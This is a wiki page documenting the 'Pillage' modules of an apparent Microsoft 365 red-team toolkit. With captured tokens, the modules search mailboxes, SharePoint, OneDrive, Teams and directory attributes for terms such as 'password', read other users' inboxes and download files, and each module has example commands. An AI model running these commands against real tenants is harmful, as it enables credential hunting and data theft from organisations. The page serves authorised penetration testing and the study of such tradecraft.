Pillage Modules

Beau Bullock edited this page Sep 3, 2023 · 22 revisions

Pillage

Invoke-SearchMailbox

This module uses the Graph search API to search for specific terms in emails and allows the user to download them, including attachments.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for in the mailbox
MessageCount   - The number of messages returned in the search results (default = 25)

Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40

Invoke-SearchSharePointAndOneDrive

This module uses the Graph search API to search for specific terms in all SharePoint and OneDrive drives available to the logged-in user. It prompts the user to choose which files to download.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for. This accepts KQL queries so you can use terms like "filetype", "content", and more.
ResultCount    - The number of files returned in the search results (default = 25)
PageResults    - Uses paging to return all possible results for a search term

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password filetype:xlsx'

Invoke-SearchTeams

This module uses the Substrate search API to search for specific terms in Teams channels visible to the logged-in user.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for in Teams messages
ResultSize     - The number of messages returned in the search results (default = 50)

Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 100

Invoke-SearchUserAttributes

This module will query user attributes from the directory and search through them for a specific term.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search across user attributes

Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

Get-Inbox

This module will pull the latest emails from the inbox of a particular user.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
userid         - Email address of the mailbox you want to read

Get-Inbox -Tokens $tokens -userid

Supplemental Modules

Invoke-DriveFileDownload

If you want to download individual files from SharePoint and OneDrive, you can pass the DriveID and ItemID values from the output of the Invoke-SearchSharePointAndOneDrive module.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
DriveItemIDs   - A combined value of the drive ID and item ID separated by a colon like this: "b!wDDN4DNGFFufSAEEN8TO3FEfeD9gdE3fm2O_-kGSapywefT_je-ghthhilmtycsZ\:01AVEVEP23EJ43DPEVEGEF7IZ6YEFEF222"
Filename       - The filename to save the downloaded file as

Invoke-DriveFileDownload -Tokens $tokens -FileName "Passwords.docx" -DriveItemIDs "b!wDDN4DNGFFufSAEEN8TO3FEfeD9gdE3fm2O_-kGSapywefT_je-ghthhilmtycsZ\:01AVEVEP23EJ43DPEVEGEF7IZ6YEFEF222"
